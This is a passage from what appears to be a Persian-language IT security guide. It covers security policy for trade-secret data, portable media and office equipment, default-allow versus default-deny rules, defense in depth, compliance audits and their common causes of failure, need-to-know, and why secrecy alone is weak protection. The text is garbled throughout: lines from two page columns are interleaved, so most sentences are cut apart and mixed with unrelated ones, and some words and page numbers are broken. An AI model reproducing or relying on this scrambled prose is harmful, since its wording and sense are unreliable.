‫ﭼﻪ ﺳﻴﺎﺳﺘﻬﺎﻳﻲ ﺑﻪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺗﺤﺖ ﮔـﻮﺍﻫﻲ "ﺍﺳـﺮﺍﺭ‬ ‫•‬
‫ﻣــﺴﺘﻘﻞ ﻭ ﻳــﺎ ﻣﻴﺰﺑــﺎﻧﻲ ﻳــﻚ ﺳــﺮﻭﻳﺲﺩﻫﻨــﺪﺓ ﻭﺏ ﺑــﺎ ﻣﺤﺘﻮﻳــﺎﺕ‬
‫ﺗﺠﺎﺭﻱ" ﺑﺮﺍﻱ ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﻓﺮﺳﺘﺎﺩﻩ ﺷﺪﻩﺍﻧﺪ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ؟‬
‫ﺳﺆﺍﻝ ﺑﺮﺍﻧﮕﻴـﺰ(‪ .‬ﺳﻴﺎﺳـﺖ ﺑﺎﻳـﺪ ﻣـﺸﺨﺺ ﻛﻨـﺪ ﻛـﻪ ﺍﻳـﻦ‬
‫ﭼﻪ ﻛﺴﻲ ﻣﺴﺌﻮﻝ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺍﺳـﺖ ﻭ ﻛﺠـﺎ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎ ﭼﮕﻮﻧﻪ ﺑﺎﻳﺪ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ‪ ،‬ﺣﻔﺎﻇـﺖ ﻭ ﺑـﺎﺯﺑﻴﻨﻲ‬
‫ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ؟‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﭼﻪ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ ﺑـﺮ ﺗﺠﻬﻴـﺰﺍﺕ ﻏﻴﺮﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﭘـﺮﺩﺍﺯﺵ‬ ‫•‬
‫ﻻ ﻗﺎﺑﻞ ﺣﻤﻞ ﻭ ﻓـﺸﺮﺩﻩ ﺍﺳـﺖ‪.‬‬ ‫ﺭﺳﺎﻧﺔ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﻣﻌﻤﻮ ﹰ‬ ‫•‬
‫ﺍﻃﻼﻋﺎﺕ ﺣﺎﻛﻢ ﻫﺴﺘﻨﺪ؟ ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﭼـﻪ ﺳﻴﺎﺳـﺘﻬﺎﻳﻲ‬
‫ﺍﮔﺮ ﻛﺴﻲ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﺳﻮﺍﺑﻖ ﻣﺎﻟﻲ ﺷـﺮﻛﺖ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﭼﺎﭘﮕﺮﻫــﺎ‪ ،‬ﺩﺳــﺘﮕﺎﻫﻬﺎﻱ ﻛﭙــﻲ ﻭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﻳﻚ ﺳﺎﻳﺖ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ ﺩﻳﺴﻚ ﻓـﺸﺮﺩﻩ ﻳـﺎ‬
‫ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﻭﺭﻧﮕﺎﺭ ﺗﺪﻭﻳﻦ ﺷﺪﻩﺍﻧﺪ؟ )ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ‬
‫‪ DVD‬ﺑﺮﻳﺰﺩ‪ ،‬ﺩﺭﺻـﻮﺭﺕ ﺩﺯﺩﻳـﺪﻩ ﻳـﺎ ﺟﺎﺑﺠـﺎ ﺷـﺪﻥ ﺁﻥ‬
‫ﺱ ﻛﺎﻏﺬﻱ ﻧﺴﺒﺖ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎ ﹺ‬
‫ﺭﺳﺎﻧﻪ ﭼﻪ ﺍﺗﻔﺎﻗﻲ ﺧﻮﺍﻫﺪ ﺍﻓﺘﺎﺩ؟ ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳـﺪ ﻣـﺸﺨﺺ‬
‫ﺍﻫﻤﻴﺖ ﻳﻜﺴﺎﻧﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ(‬
‫ﻛﻨﻨﺪ ﻛﻪ ﭼﻪ ﻛﺴﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻳﻚ ﺭﺳﺎﻧﻪ ﺭﺍ ﺑـﻪ ﺑﻴـﺮﻭﻥ ﺍﺯ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪١٥٤‬‬

‫ﺳﻴﺎﺳﺖ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬ ‫ﻓﻜﺮ ﻛﺮﺩﻥ ﺑﻪ ﻫﻤﺔ ﺍﻳﻦ ﻣﺴﺎﺋﻞ ﻗﺒﻞ ﺍﺯ ﻭﻗﻮﻉ ﻫﺮ ﻣﺸﻜﻠﻲ ﻛﻤﻚ‬
‫ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺘﻮﺍﻥ ﺍﺯ ﻭﻗﻮﻉ ﺁﻥ ﻣـﺸﻜﻞ ﺟﻠـﻮﮔﻴﺮﻱ ﻛـﺮﺩ‪ .‬ﺗﻬﻴـﺔ‬
‫ﻱ ﺭﻋﺎﻳﺖ ﺳﻴﺎﺳﺖ‪ ٨٤‬ﻋﺒـﺎﺭﺕ ﺍﺳـﺖ ﺍﺯ ﺍﻗـﺪﺍﻣﺎﺗﻲ ﻛـﻪ‬ ‫ﻳﻚ ﻣﻤﻴﺰ ﹺ‬
‫ﻋﺒﺎﺭﺗﻬﺎﻱ ﺑﺎﻣﻌﻨﻲ ﺩﺭ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻫﻤﻪ ﻛﻤـﻚ ﻣـﻲﻛﻨـﺪ‬
‫ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ ﺗﺎ ﻣﺸﺨﺺ ﮔﺮﺩﺩ ﺁﻳﺎ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺫﻛﺮﺷـﺪﻩ ﺩﺭ‬
‫ﻧﮕﺮﺍﻧﻴﻬﺎ ﺭﺍ ﺑﻔﻬﻤﻨﺪ ﻭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺻـﺤﻴﺢ ﭘﻴـﺸﮕﻴﺮﻱ ﺭﺍ ﺑﻜـﺎﺭ‬
‫ﺳﻴﺎﺳﺖ ﺭﻋﺎﻳﺖ ﻣﻲﺷﻮﻧﺪ ﻳـﺎ ﻧـﻪ‪ ،‬ﻭ ﺍﮔـﺮ ﻧﻤـﻲﺷـﻮﻧﺪ ﺩﻟﻴـﻞ ﺁﻥ‬
‫ﺑﻨﺪﻧﺪ‪.‬‬
‫ﻻ ﻣﻌﻴﺎﺭﻫــﺎ ﻭ ﺭﻭﺷــﻬﺎﻳﻲ ﺑــﺮﺍﻱ‬‫ﭼﻴــﺴﺖ‪ .‬ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻣﻌﻤــﻮ ﹰ‬
‫ﺳﻨﺠﻴﺪﻩﺷﺪﻥ ﺧﻮﺩ ﻧﻴﺰ ﺑﺪﺳﺖ ﻣﻲﺩﻫﻨﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻂ ﻳﻚ‬
‫ﺑﺮﺍﻱ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺭﻭﻳﻜﺮﺩ ﭘﺎﻳﻪ ﺍﺗﺨﺎﺫ ﻛﻨﻴﺪ‬
‫ﻣﻤﻴﺰ ﺑﺮﺍﻱ ﺍﻧﺪﺍﺯﻩ ﮔﻴﺮﻱ ﺭﻋﺎﻳﺖﺷـﺪﻥ ﻳـﺎ ﻧـﺸﺪﻥ ﺁﻥ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ‬
‫ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﺩ‪ .‬ﺍﮔﺮ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﻋﺎﻳﺖ ﻧـﺸﺪﻩ ﺑﺎﺷـﻨﺪ‪،‬‬ ‫ﺍﺑﺘﺪﺍ ﺑﺒﻴﻨﻴﺪ ﻛﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻃﺒﻖ ﻛﺪﺍﻡ ﺍﻟﮕﻮﻱ ﺯﻳﺮ ﻋﻤـﻞ ﻛﻨﻴـﺪ‪:‬‬
‫ﺍﻳﻦ ﺍﻣﺮ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺘﻴﺠﺔ ﻫﺮ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺑﺎﺷﺪ‪:‬‬ ‫"ﻫﺮﭼﻪ ﺻﺮﺍﺣﺘﹰﺎ ﻣﻤﻨـﻮﻉ ﺍﻋـﻼﻡ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ ﻣﺠـﺎﺯ ﺍﺳـﺖ" ﻳـﺎ‬
‫"ﻫﺮﭼﻪ ﺻﺮﺍﺣﺘﹰﺎ ﻣﺠﺎﺯ ﺩﺍﻧﺴﺘﻪ ﻧﺸﺪﻩ ﺑﺎﺷﺪ ﻣﻤﻨﻮﻉ ﺍﺳـﺖ"‪ .‬ﺳـﭙﺲ‬
‫ﻛﻮﺗﺎﻫﻲ ﻛﺎﺭﻛﻨﺎﻥ؛‬ ‫•‬
‫ﺑﺒﻴﻨﻴﺪ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﺭﺍ ﭼﮕﻮﻧﻪ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺗﻌﺮﻳـﻒ ﻛﻨﻴـﺪ‪ .‬ﻣﻤﻜـﻦ‬
‫ﺁﻣﻮﺯﺵ ﻧﺎﻛﺎﻓﻲ ﻭ ﻓﻘﺪﺍﻥ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻻﺯﻡ؛‬ ‫•‬
‫ﺍﺳﺖ ﻣﻮﺭﺩ ﺍﻭﻝ ﺑﺎ ﻳﻚ ﻣﺤﻴﻂ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺎﺯ ﺳﺎﺯﮔﺎﺭ ﺑﺎﺷﺪ‪ ،‬ﻣﺜﻞ ﻳﻚ‬
‫ﻛﺎﺭ ﺯﻳﺎﺩ؛‬ ‫•‬
‫ﺩﺍﻧﺸﮕﺎﻩ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﻣﻮﺭﺩ ﺩﻭﻡ ﺑﻴﺸﺘﺮ ﺑﺮﺍﻱ ﻳﻚ ﻣﺆﺳﺴﺔ ﺗﺠﺎﺭﻱ‬
‫ﻧﻘﺺ ﺍﻣﻜﺎﻧﺎﺕ؛‬ ‫•‬
‫ﻣﻨﺎﺳﺐ ﺍﺳﺖ‪ ،‬ﻣﺎﻧﻨﺪ ﻳﻚ ﺑﺎﻧﻚ‪.‬‬
‫ﻧﺪﺍﺷﺘﻦ ﺍﻧﮕﻴﺰﺓ ﻻﺯﻡ؛‬ ‫•‬
‫ﻛﻤﺒﻮﺩ ﻭﺳﺎﻳﻞ ﻛﺎﻓﻲ؛‬ ‫•‬ ‫ﺩﻓﺎﻉ ﺩﺭ ﻋﻤﻖ‬
‫ﻣﻨﺎﺑﻊ ﻧﺎﻛﺎﻓﻲ ﻳﺎ ﻧﺎﻣﻨﺎﺳﺐ؛‬ ‫•‬
‫ﻭﻗﺘﻲ ﺑـﺮﺍﻱ ﺳﻴﺎﺳـﺖ ﻭ ﺭﻭﺷـﻬﺎﻱ ﻣﻘﺎﺑﻠـﺔ ﺧـﻮﺩ ﺑﺮﻧﺎﻣـﻪﺭﻳـﺰﻱ‬
‫ﺗﻌﻤﻴﺮﺍﺕ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻧﺎﻛﺎﻓﻲ؛‬ ‫•‬
‫ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺩﺭ ﻳﻚ ﻻﻳﻪ ﻣﺘﻮﻗﻒ ﻧـﺸﻮﻳﺪ ﻭ ﺑـﺮﺍﻱ ﺩﻓـﺎﻉ ﺩﺭ ﺑﺮﺍﺑـﺮ‬
‫ﻛﺎﺭﺑﺮﺩ ﻳﺎ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ؛‬ ‫•‬
‫ﺗﻬﺪﻳﺪﺍﺕ ﻣﺨﺘﻠﻒ‪ ،‬ﭼﻨﺪ ﺳﻄﺢ ﺣﻔﺎﻇﺘﻲ ﻫﻤﭙﻮﺷﺎﻥ ﻭ ﻣﺴﺘﻘﻞ ﺑﻨـﺎ‬
‫ﻧﺎﺭﺳﺎﺋﻴﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ؛‬ ‫•‬
‫ﻧﻤﺎﺋﻴﺪ‪ .‬ﺳﭙﺲ ﻧﻈﺎﺭﺕ ﻭ ﺑﺎﺯﺑﻴﻨﻲ ﺭﺍ ﻧﻴﺰ ﺑﻪ ﺁﻥ ﻣﺠﻤﻮﻋﻪ ﺑﻴﺎﻓﺰﺍﻳﻴﺪ‬
‫ﺑﻲﻣﺴﺌﻮﻟﻴﺘﻲ؛‬ ‫•‬
‫ﺗﺎ ﻣﻄﺌﻤﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﺗﺨﺎﺫﺷﺪﻩ‪ ،‬ﺩﺭ ﻋﻤﻞ ﻧﻴﺰ‬
‫ﺗﺪﺍﺧﻞ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ؛‬ ‫•‬
‫ﻭﺍﻗﻌﹰﺎ ﺟﻮﺍﺏ ﻣﻲﺩﻫﺪ‪ .‬ﺍﺣﺘﻤﺎﻝ ﮔﺮﻳﺰ ﻳـﻚ ﻣﻬـﺎﺟﻢ ﺍﺯ ﺗﻨﻬـﺎ ﻳـﻚ‬
‫ﺗﻘﺴﻴﻢ ﻛﺎﺭ ﻧﺎﻣﺸﺨﺺ‪ ،‬ﻧﺎﻫﻤﺎﻫﻨﮓ ﻭ ﮔﻴﺞﻛﻨﻨﺪﻩ؛‬ ‫•‬
‫ﻼ ﺳـﻪ‬‫ﻣﺠﻤﻮﻋﺔ ﺩﻓﺎﻋﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺯ ﺍﺣﺘﻤﺎﻝ ﮔﺮﻳـﺰﺵ ﺍﺯ ﻣـﺜ ﹰ‬
‫ﻧﺎﺭﺳﺎﺋﻴﻬﺎﻱ ﺳﻴﺎﺳﺖ؛‬ ‫•‬ ‫‪٨٢‬‬
‫ﻣﺮﺣﻠﺔ ﺩﻓﺎﻋﻲ ﺑﻌﻼﻭﺓ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﺧﻄﺎﺭ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﭘﻴﺶﺑﻴﻨﻲ ﻧﺸﺪﻩ؛‬ ‫•‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﻧﺎﻗﺺ ﻳﺎ ﺍﺯ ﻗﻠﻢ ﺍﻓﺘﺎﺩﻩ؛‬ ‫•‬
‫ﺿﻤﺎﻧﺖ ﺍﺟﺮﺍﻳﻲ‪ ،‬ﻭ ﺑﺎﺯﺑﻴﻨﻲﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﻣﺘﺪﺍﺧﻞ؛ ﻭ‬ ‫•‬
‫ﻧﺎﺳﺎﺯﮔﺎﺭﻱ ﺳﻴﺎﺳﺖ ﻭ ﻣﺤﻴﻂ‪.‬‬ ‫•‬ ‫ﺗﺪﻭﻳﻦ ﺳﻴﺎﺳﺖ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻛﺎﻓﻲ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﻣﺮﺗﺒﹰﺎ ﺑﺮﺭﺳﻲ‬
‫ﺷﻮﺩ ﻛﻪ ﺁﻳﺎ ﺳﻴﺎﺳﺖ ﺍﺗﺨﺎﺫ ﺷﺪﻩ ﺑﺼﻮﺭﺕ ﺻﺤﻴﺢ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ‬
‫ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺩﺭ ﻓﻬﺮﺳﺖ ﺑﺎﻻ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻣﺸﻜﻼﺕ ﺳﻴﺎﺳـﺖ‬
‫ﻳﺎ ﻧﻪ‪ ،‬ﻭ ﺍﮔﺮ ﺍﻋﻤﺎﻝ ﻣﻲﺷﻮﺩ ﺁﻳﺎ ﻛﺎﻓﻲ ﻭ ﺻﺤﻴﺢ ﺍﺳـﺖ ﻳـﺎ ﺧﻴـﺮ‪.‬‬
‫ﺭﺍ ﻧﻤﻲﺗﻮﺍﻥ ﻧﺎﺷﻲ ﺍﺯ ﺧﻄﺎﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﺭﺍﻫﺒﺮﺍﻥ ﺩﺍﻧﺴﺖ‪ .‬ﺣﺘـﻲ‬
‫ﻭﺍﮊﺓ ﻣﻤﻴﺰﻱ‪ ٨٣‬ﺑﺎﺭ ﻣﻌﻨﺎﻳﻲ ﺟﺪﻳﺪﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩ ﻭ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ‬
‫ﺁﻣﻮﺯﺵ ﻧﺎﻛﺎﻓﻲ ﻳﺎ ﺍﺿـﺎﻓﻪﻛـﺎﺭ ﺑـﻴﺶ ﺍﺯ ﺣـﺪ ﻋﻤﻮﻣـﹰﺎ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ‬
‫ﺣﺪﺍﻗﻞ ﺩﺭ ﻣﻌﺎﻧﻲ ﻣﻤﻴﺰﻱ ﻣﺎﻟﻲ‪ ،‬ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﺭﺩﮔﻴﺮﻱ )ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻱ ﺭﻋﺎﻳﺖ ﻧﺒﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳـﻚ‬ ‫ﺭﺍﻫﺒﺮﺍﻥ ﻧﻴﺴﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻳﻚ ﻣﻤﻴﺰ ﹺ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒـﺖ(‪ ،‬ﺑﺎﺯﺑﻴﻨﻲ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺳﻴـﺴﺘﻢ‪ ،‬ﻭ ﺑـﺎﺯﺑﻴﻨﻲ ﺭﻋﺎﻳـﺖ‬
‫ﻓﺮﺁﻳﻨﺪ ﻧﺎﻣﻄﻠﻮﺏ ﺩﻳﺪﻩ ﺷﻮﺩ؛ ﺑﻠﻜـﻪ ﺑﺎﻳـﺪ ﺑـﻪ ﺁﻥ ﺑـﺼﻮﺭﺕ ﻳـﻚ‬
‫ﺗﻼﺵ ﻫﻤﮕﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺸﺨﻴﺺ ﻣﺸﻜﻼﺕ‪ ،‬ﻳﺎﻓﺘﻦ ﻭ ﺗﺨـﺼﻴﺺ‬
‫ﻣﺠﺪﺩ ﻣﻨﺎﺑﻊ‪ ،‬ﭘﺎﻻﻳﺶ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﻭ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ‬ ‫ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﺑﻪ ﻣﻨﺒﻊ ﺯﻳﺮ‪ ،‬ﻧﻮﺷﺘﺔ ‪:Tom Kellermann‬‬ ‫‪۸۲‬‬
‫ﺩﺭ ﺯﻣﻴﻨﺔ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﮕﺮﻳـﺴﺖ‪ .‬ﻣـﺸﺎﺑﻪ ﻫﻤـﺔ ﻗـﺴﻤﺘﻬﺎﻱ‬ ‫‪"The 12 Layer Matrix: Building a Cyber-‬‬
‫‪Fortress (2003)":‬‬
‫‪http://wbln0018.worldbank.org/html/FinancialS‬‬
‫‪ectorWeb.nsf/SearchGeneral?openform&E-‬‬
‫‪Security/E-Finance&Tools‬‬
‫‪84‬‬ ‫‪Compliance Audit Policy‬‬ ‫‪83‬‬ ‫‪Audit‬‬
‫‪١٥٥‬‬ ‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬

‫ﻣﻄﻠﺐ ﺑﻴﺎﻣﻮﺯﻧﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺩﺳﺘﮕﺎﻫﻬﺎ ﺑﻬـﺮﺓ ﺑـﺴﻴﺎﺭ ﻛﻤـﻲ‬ ‫ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ‪ ،‬ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﺭﻭﻳﻜﺮﺩ ﮔﺮﻭﻫﻲ ﺩﺭ ﺍﻛﺜﺮ ﻗﺮﻳﺐ ﺑﻪ ﺍﺗﻔﺎﻕ‬
‫ﺑﺒﺮﻧﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻤﻜﻦ ﺍﺳـﺖ ﺍﻧﮕﻴـﺰﺓ ﺍﻳـﺸﺎﻥ ﺗـﻀﻌﻴﻒ ﺷـﻮﺩ‪،‬‬ ‫ﺷﺮﺍﻳﻂ ﻣﺆﺛﺮﺗﺮﻳﻦ ﺭﻭﻳﻜـﺮﺩ ﺍﺳـﺖ‪ .‬ﺍﮔـﺮ ﻣـﺴﺌﻠﻪ ﺑﻄـﻮﺭ ﺻـﺤﻴﺢ‬
‫ﭼﺮﺍﻛﻪ ﭘﻴﺎﻡ ﺿﻤﻨﻲ ﻣﺪﻳﺮﻳﺖ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ "ﻣﺎ ﺑﻪ‬ ‫ﻣﺪﻳﺮﻳﺖ ﺷﻮﺩ‪ ،‬ﻛﺎﺭﻛﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ ﺍﻣﻨﻴـﺖ ﻣﻄﻠـﻮﺏ ﺩﺳـﺖ‬
‫ﺷﻤﺎ ﺍﻋﺘﻤﺎﺩ ﻛﺎﻣﻞ ﻧـﺪﺍﺭﻳﻢ ﻛـﻪ ﻳـﻚ ﻛـﺎﺭﺑﺮ ﻣـﺴﺌﻮﻟﻴﺖﺷـﻨﺎﺱ‬ ‫ﻳﺎﺑﻨﺪ‪ .‬ﻧﻜﺘﺔ ﻛﻠﻴﺪﻱ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺩﺭ ﺍﻧﺠـﺎﻡ ﻛﺎﺭﻫﺎﻳـﺸﺎﻥ‬
‫ﺑﺎﺷﻴﺪ"‪ .‬ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺩﺭ ﭼﻨﻴﻦ ﺷﺮﺍﻳﻄﻲ ﺍﮔـﺮ ﻛـﺴﻲ ﺑـﻪ ﺳـﻮﺀ‬ ‫ﻛﻤــﻚ ﻛﻨــﻴﻢ‪ ،‬ﻧــﻪ ﺍﻳﻨﻜــﻪ ﺧــﻮﺩ ﺭﺍ ﺩﺭ ﻃــﺮﻑ ﺩﻳﮕــﺮ ﻣﻴــﺰ ﻭ ﺩﺭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﺍﻣﻴﻦ ﻭ ﻭﻳﮋﮔﻴﻬﺎﻱ ﺳﻴﺴﺘﻢ ﺑﭙﺮﺩﺍﺯﺩ‪ ،‬ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫ﻣﻘﺎﺑﻠﺸﺎﻥ ﻗﺮﺍﺭ ﺩﻫﻴﻢ‪.‬‬
‫ﻣﺪﻳﺮﻳﺖ ﺗﻮﺍﻧﺎﻳﻲ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺷـﻨﺎﺧﺖ ﻭ ﻣﺒـﺎﺭﺯﻩ ﺑـﺎ ﻣـﺸﻜﻞ ﺭﺍ‬
‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛ ﻭ ﺍﮔﺮ ﻣﺴﺌﻠﻪﺍﻱ ﺑﺮﺍﻱ ﻳﻚ ﻳﺎ ﺩﻭ ﻧﻔـﺮ ﺍﺯ ﻛـﺎﺭﺑﺮﺍﻥ‬ ‫ﺍﺷﻜﻼﺕ ﺍﻣﻨﻴﺖ ﻣﺒﺘﻨﻲ ﺑﺮ ﺟﻬﻞ ﻣﻬﺎﺟﻢ‬
‫ﻛﻪ ﻣﺠﺎﺯ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺳﻨﺎﺩ ﺑﻮﺩﻩﺍﻧﺪ ﺭﺥ ﺩﻫﺪ‪ ،‬ﺩﻳﮕﺮ ﻛﺴﻲ ﺑـﺎ‬ ‫ﻲ ﺍﻣﻨﻴﺖ ﻛﻪ ﻋﻤﺪﺗﹰﺎ ﺍﺯ ﺳـﺎﺯﻣﺎﻥ ﺍﻃﻼﻋـﺎﺕ‬ ‫ﺩﺭ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺳﻨﺘ ﹺ‬
‫ﺗﺠﺮﺑــﻪ ﻳــﺎ ﺍﻃﻼﻋــﺎﺕ ﻻﺯﻡ ﻭﺟــﻮﺩ ﻧــﺪﺍﺭﺩ ﻛــﻪ ﺩﺭ ﻣﻮﺍﻗــﻊ ﺑــﺮﻭﺯ‬ ‫ﺍﺭﺗﺶ ﻧﺸﺄﺕ ﻣﻲﮔﺮﻓﺖ ﻳﻚ ﻣﻔﻬﻮﻡ ﺑﺎ ﻋﻨﻮﺍﻥ "ﻧﻴﺎﺯ ﺑﻪ ﺩﺍﻧـﺴﺘﻦ"‬
‫ﻣﺸﻜﻼﺕ ﻫﻤﻴﺎﺭﻱ ﻛﻨﺪ‪.‬‬ ‫ﻭﺟﻮﺩ ﺩﺍﺷﺖ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺗﻘﺴﻴﻢﺑﻨﺪﻱ ﻣﻲﺷﺪ ﻭ ﺑﻪ ﻫﺮ ﻛﺲ ﺁﻧﻘﺪﺭ‬
‫ﻣﺤﺮﻣﺎﻧﻪ ﻧﮕﻬﺪﺍﺷﺘﻦ ﺍﺷﻜﺎﻻﺕ ﻳﺎ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﺣﻔﺎﻇـﺖ‬ ‫ﺍﺯ ﺁﻥ ﺗﺨﺼﻴﺺ ﻣﻲﻳﺎﻓﺖ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﺑﺎ ﺁﻥ ﺑـﻪ ﻭﻇـﺎﻳﻔﺶ ﻋﻤـﻞ‬
‫ﺩﺭ ﻣﻘﺎﺑــﻞ ﺁﻧﻬــﺎ ﻧﻴــﺰ ﻳــﻚ ﺭﻭﻳﻜــﺮﺩ ﺿــﻌﻴﻒ ﺍﻣﻨﻴﺘــﻲ ﺍﺳــﺖ‪.‬‬ ‫ﻛﻨــﺪ‪ .‬ﺩﺭ ﻣﺤﻴﻄﻬــﺎﻳﻲ ﻛــﻪ ﻗــﺴﻤﺘﻬﺎﻱ ﺧﺎﺻــﻲ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ ﺍﺯ‬
